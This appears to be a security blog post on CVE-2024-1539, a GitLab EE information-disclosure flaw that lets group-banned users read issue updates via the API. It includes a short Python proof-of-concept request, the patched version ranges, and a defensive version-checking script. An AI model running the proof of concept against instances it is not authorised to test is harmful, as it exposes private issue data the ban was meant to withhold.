Overview

A recently discovered vulnerability in GitLab Enterprise Edition (EE) threatens user data privacy, allowing unauthorized information disclosure in some cases. The issue is assigned identifier CVE-2024-1539 and affects multiple versions of GitLab EE. The vulnerability allows an unauthorized user to gain access to updates on issues even after being banned from the group using the Application Programming Interface (API). In this long-read post, we'll analyze the vulnerability, provide the code snippets to demonstrate the exploit, and share links to the original references and patches.

Exploit Description

The vulnerability manifests when a user who should no longer have access, such as a member banned from the group, makes API calls to fetch updates on issues. Despite the ban, GitLab EE still returns the issue updates, disclosing information the ban was meant to withhold; this is the information disclosure tracked as CVE-2024-1539.

Here is a code snippet that demonstrates the exploit using Python and the GitLab API:

import requests

# Set up authentication as the banned user
headers = {
    'Private-Token': 'your_private_token_here',
}

# The GitLab instance's URL and the vulnerable API endpoint
# Replace ':id', ':issue_iid', and ':date' with the project ID, the issue IID and the date
url = "https://your-gitlab-instance.com/api/v4/projects/:id/issues/:issue_iid?updated_after=:date"

# A timeout keeps the script from hanging on an unresponsive instance
response = requests.get(url, headers=headers, timeout=30)

# Check if the banned user can access issue updates
if response.status_code == 200:
    print("Vulnerability CVE-2024-1539 exists!")
    print("Issue updates:")
    print(response.json())
else:
    # Any other status means the request was refused; note that an invalid
    # token also yields a non-200 status, so confirm the token works elsewhere
    print("GitLab instance is not vulnerable (HTTP %d)." % response.status_code)

Replace your_private_token_here with the banned user's private token and your-gitlab-instance.com with your GitLab instance's URL. Additionally, substitute :id, :issue_iid, and :date with the project ID, the issue's IID, and the date value to test the exploit.

Original References and Patch Details

Acknowledgments: GitLab initially identified the issue and assigned it identifier CVE-2024-1539, while also releasing a patch for the affected versions.

GitLab Security Advisory: This link will take you to the official GitLab security advisory detailing the vulnerability and necessary mitigation measures.

Patch Details: To address the vulnerability, it is recommended that you update your GitLab EE instance to the latest available version. Here are the relevant patches:

- For versions 15.2 through 16.9.6, update to version 16.9.7
- For versions 16.10 through 16.10.4, update to version 16.10.5
- For versions 16.11 through 16.11.1, update to version 16.11.2

It is essential to review, understand, and apply the appropriate security patches to your GitLab EE instance to ensure that you and your users are protected against the disclosed vulnerability.
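As an added example (not code from the original post or from GitLab), the following Python script checks a GitLab EE version string against the affected ranges listed above and reports which fixed release to upgrade to; the version string could come from the instance's own GET /api/v4/version endpoint, but here sample values are constructed inline so it runs offline.

```python
# Added example: map a GitLab EE version to the fixed release for CVE-2024-1539.
# The ranges below are the ones stated in the patch details of this post.
from typing import Optional, Tuple

# (first affected, last affected, fixed release) per the advisory text above
AFFECTED_RANGES = (
    ((15, 2, 0), (16, 9, 6), "16.9.7"),
    ((16, 10, 0), (16, 10, 4), "16.10.5"),
    ((16, 11, 0), (16, 11, 1), "16.11.2"),
)


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn '16.9.6', '16.9.6-ee' or '16.10' into a comparable (major, minor, patch) tuple."""
    core = version.strip().split("-", 1)[0]   # drop edition suffixes such as '-ee'
    parts = [int(p) for p in core.split(".")]
    if not 1 <= len(parts) <= 3:
        raise ValueError(f"unrecognised version string: {version!r}")
    while len(parts) < 3:
        parts.append(0)                       # '16.10' means 16.10.0
    return (parts[0], parts[1], parts[2])


def required_upgrade(version: str) -> Optional[str]:
    """Return the fixed release to upgrade to, or None if the version is outside every affected range."""
    v = parse_version(version)
    for low, high, fixed in AFFECTED_RANGES:
        if low <= v <= high:
            return fixed
    return None


def check_instance(version: str) -> str:
    """Human-readable verdict for one instance version."""
    fixed = required_upgrade(version)
    if fixed is None:
        return f"{version}: not in a range affected by CVE-2024-1539"
    return f"{version}: affected by CVE-2024-1539, upgrade to {fixed}"


if __name__ == "__main__":
    # Constructed sample versions, not real instances
    for sample in ("16.9.6-ee", "16.9.7-ee", "16.10.2", "16.11.2", "17.0.0"):
        print(check_instance(sample))
```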

Timeline

Published on: 02/05/2025 10:15:22 UTC